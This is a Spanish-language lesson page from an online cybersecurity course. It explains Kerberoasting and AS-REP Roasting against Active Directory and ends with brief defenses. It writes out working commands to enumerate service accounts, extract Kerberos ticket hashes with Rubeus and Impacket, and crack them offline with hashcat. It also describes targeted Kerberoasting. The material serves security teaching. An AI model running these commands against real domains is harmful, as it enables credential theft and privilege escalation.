0Pricing
Cyber Security Academy · Lección

Kerberoasting y AS-REP Roasting

Solicite tickets de servicio de Kerberos y descífrelos sin conexión con Hashcat.

Kerberoasting y AS-REP Roasting es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 3 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.

Cifrado de tickets de Kerberos

Los tickets de servicio se cifran con el hash de la contraseña de la cuenta de servicio. Cualquier usuario del dominio puede solicitar un ticket de servicio para cualquier SPN. Si la cuenta de servicio tiene una contraseña débil, el ticket se puede crackear sin conexión.

¿Qué es Kerberoasting?

Kerberoasting solicita tickets de servicio para cuentas con nombres principales de servicio (SPN), extrae el ticket cifrado y lo crackea sin conexión con Hashcat. No requiere privilegios elevados: cualquier usuario del dominio puede hacerlo.

# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with Hashcat

Búsqueda de SPN

Enumere todas las cuentas de servicio con SPN mediante PowerView, Impacket o las herramientas nativas de AD. Los SPN vinculan las cuentas de servicio con sus servicios.

# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com

# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
  "(servicePrincipalName=*)" cn servicePrincipalName

Solicitud y extracción de tickets

Rubeus (Windows) y GetUserSPNs de Impacket (Linux) solicitan tickets y los muestran en un formato que se puede crackear.

# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
  -request -outputfile hashes.txt

Cracking con Hashcat

Los hashes de Kerberoast utilizan el modo 13100 (Kerberos 5 TGS-REP). Utilice una lista de palabras robusta con reglas para obtener la máxima eficacia.

# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# AES tickets: mode 19700 (AES128) or 19800 (AES256)

¿Qué es AS-REP Roasting?

AS-REP Roasting ataca las cuentas que tienen habilitada la opción No requerir la preautenticación de Kerberos. El AS devuelve un TGT cifrado con el hash del usuario; se puede solicitar sin conocer la contraseña y crackear sin conexión.

Búsqueda de cuentas con la preautenticación deshabilitada

Las cuentas sin preautenticación representan una configuración incorrecta y suelen quedar así debido a aplicaciones heredadas. Enumérelas mediante PowerView o GetNPUsers.

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
  -dc-ip dc.corp.com -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txt

Cracking de hashes AS-REP

Los hashes AS-REP utilizan el modo 18200 de Hashcat. El proceso de cracking es igual que en Kerberoasting: un ataque de diccionario sin conexión contra la respuesta AS cifrada.

# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

Evaluación del impacto

Las contraseñas de cuentas de servicio crackeadas suelen tener privilegios elevados: las cuentas de servicio que ejecutan bases de datos, software de copias de seguridad o Exchange pueden ser administradores del dominio. Las cuentas AS-REP suelen pasarse por alto y tener una protección débil.

Kerberoasting dirigido

Si tiene acceso de escritura a un objeto, puede añadir temporalmente un SPN a una cuenta de alto valor, hacerle Kerberoasting, crackear el hash y eliminar después el SPN para atacar cuentas específicas bajo demanda.

Defensas

Defensa contra Kerberoasting: utilice contraseñas largas y aleatorias (25 caracteres o más) para las cuentas de servicio o, mejor aún, utilice Group Managed Service Accounts (gMSA) con contraseñas de 120 caracteres que roten automáticamente. Para AS-REP: habilite la preautenticación en todas las cuentas.

Comprobación rápida

¿Qué atributo de cuenta se necesita para que funcione AS-REP Roasting?

Resumen: Kerberoasting y AS-REP Roasting

Ambos ataques explotan debilidades del cifrado de tickets de Kerberos para crackear contraseñas sin conexión y sin provocar bloqueos de cuentas. Kerberoasting ataca cuentas con SPN (cualquier usuario del dominio puede hacerlo); AS-REP Roasting ataca cuentas sin preautenticación (no se necesitan credenciales). Defiéndase mediante gMSA para las cuentas de servicio y exija la preautenticación para todos los usuarios.

Preguntas frecuentes

¿La lección «Kerberoasting y AS-REP Roasting» es gratis?

Sí — el texto completo de «Kerberoasting y AS-REP Roasting» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.

¿Qué aprenderé en «Kerberoasting y AS-REP Roasting»?

Solicite tickets de servicio de Kerberos y descífrelos sin conexión con Hashcat. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.

¿Necesito experiencia previa para empezar Cyber Security Academy?

No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 3 de 4.

¿Cuánto tiempo toma la lección «Kerberoasting y AS-REP Roasting»?

La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.

¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?

Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.

Todas las lecciones de este curso

  1. Autenticación de Windows: NTLM y Kerberos
  2. Ataques Pass-the-Hash y Pass-the-Ticket
  3. Kerberoasting y AS-REP Roasting
  4. Refuerzo de Active Directory
← Volver a Cyber Security Academy